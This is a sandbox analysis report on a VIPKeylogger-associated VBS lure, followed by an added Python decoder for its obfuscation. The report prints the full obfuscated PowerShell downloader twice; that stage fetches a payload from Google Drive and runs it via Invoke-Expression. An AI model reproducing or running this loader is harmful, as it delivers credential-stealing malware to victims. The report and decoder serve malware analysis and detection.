Analysis Overview
SHA256
400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741
Threat Level: Known bad
The file Pedido de Cotação-24100004_lista comercial.vbs (Portuguese for "Quotation Request-24100004_commercial list", a procurement-themed lure name) was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Network Service Discovery
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Command and Scripting Interpreter: PowerShell
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-23 14:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-23 14:46
Reported
2024-10-23 14:48
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: 
FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V 
oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . 
Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: 
FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V 
oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . 
Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
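The powershell.exe command line in the Processes list above is a character-stride obfuscator. Every string literal is passed through the `Pummice` function, which, under a normal console host (`$host.UI` is non-null, so `$Rabbit185` becomes 1), walks indices 5, 11, 17, ... while the index is below `length - 1`: it keeps the sixth character of each six-character chunk and drops the trailing chunk. `Tvanglst` then dot-sources the decoded text through `$Blokdiagrams`, which decodes to `IeX` (Invoke-Expression). Read this way, the script pins TLS 1.2, creates a System.Net.WebClient with a Firefox-style `Mozilla/5.0 ...` User-Agent, downloads the Google Drive URL (the URL string is split on `>` so several fallback URLs can be packed into one literal) to `$env:APPDATA + '\Symbolerne.rab'` (the plain `$Uraturia` literal, and the dropped file in the Files section) inside a Test-Path / Start-Sleep 4 retry loop, reads the file back, Base64-decodes it, takes `.SubString($Podzolic, $Maidenhood)` = `SubString(313753, 30049)` of the ASCII result and Invoke-Expressions that as the next stage. The decoder below is an added example, not part of the sandbox report; the helper names are mine, and the sample literals are copied verbatim from the command line above.

```python
"""Decoder for the character-stride obfuscation in the PowerShell stage above.

Added example, not part of the sandbox report. It re-implements the script's
Pummice function: $Rabbit185 is 1 when $host.UI exists, $Pusses is
len - $Rabbit185 ($Oprydningsarbejdencumberment is never set, so it is 0),
and the loop keeps every sixth character starting at index 5 while the index
stays below $Pusses. Tvanglst feeds the result to Invoke-Expression.
"""
import re

# Matches both `Pummice '...'` and `(Pummice '...')`; the script's literals
# contain no embedded single quotes.
PUMMICE_CALL = re.compile(r"Pummice '([^']*)'")


def pummice(literal: str, host_ui_present: bool = True) -> str:
    """Decode one Pummice literal exactly as the PowerShell function does."""
    rabbit = 1 if host_ui_present else 0      # $Rabbit185
    limit = len(literal) - rabbit             # $Pusses
    return "".join(literal[i] for i in range(5, limit, 6))


def decode_literals(script: str, host_ui_present: bool = True) -> list:
    """Every Pummice '...' literal in the script, decoded, in order of appearance."""
    return [pummice(lit, host_ui_present) for lit in PUMMICE_CALL.findall(script)]


def deobfuscate(script: str, host_ui_present: bool = True) -> str:
    """Rewrite the script with each Pummice call replaced by its decoded literal."""
    def repl(m):
        decoded = pummice(m.group(1), host_ui_present).replace("'", "''")
        return "'" + decoded + "'"
    return PUMMICE_CALL.sub(repl, script)


# Literals copied verbatim from the powershell.exe command line in the report.
SAMPLE = (
    "$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';"
    "$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';"
    "$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';"
    "$Promulges=Pummice ' Kont>Tunge ';"
)

if __name__ == "__main__":
    # Prints: $Blokdiagrams='IeX';$dokumentnavnet='Mozilla/';$Adenomycosis='USER-agENT';$Promulges='>';
    print(deobfuscate(SAMPLE))
```

Two practical caveats. First, the `$host.UI` check is a cheap sanity test against emulators: with `host_ui_present=False` the trailing chunk is no longer dropped, so `'Fila ISamfueR.gimXEncep '` decodes to `'IeX '` with a trailing space, and longer literals pick up a stray character at the end. Second, the copy of the command line reproduced on this page has runs of consecutive spaces collapsed in a few places, so some of the long literals (the User-Agent, the Get-Content line) decode with a handful of wrong characters here; run the decoder on the command line as captured by the sandbox, not on the rendered page.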
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.73:80 | crl.microsoft.com | tcp |
Files
memory/2672-4-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp
memory/2672-6-0x0000000002340000-0x0000000002348000-memory.dmp
memory/2672-5-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2672-7-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-8-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-9-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-10-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-12-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp
memory/2672-13-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
memory/2672-15-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MHP6VHWR454BS9L5LFT.temp
| MD5 | 53eb1a2da1daa6ff5f0ececcca12b7ef |
| SHA1 | 25998cd34dffa6cbdf55b227ab1a7fe728859e15 |
| SHA256 | 0366a5fb82142abd3491d6a802fb3599f42f168b2311158c1b9eb342f1d30bfa |
| SHA512 | 46e1454dd024b8f56aa31b5c5ab6d33d26da1cc43cf0d6253763d9ee5fadaa425652bfde4d0c08a6a71505f4b91d283589fd472174a63d55c4956e60b325da21 |
C:\Users\Admin\AppData\Roaming\Symbolerne.rab
| MD5 | 4fa4bfe12534bd26a9e268a1e659e510 |
| SHA1 | f42014f4e7c0f11f4bb5f559c88310eb6db186a3 |
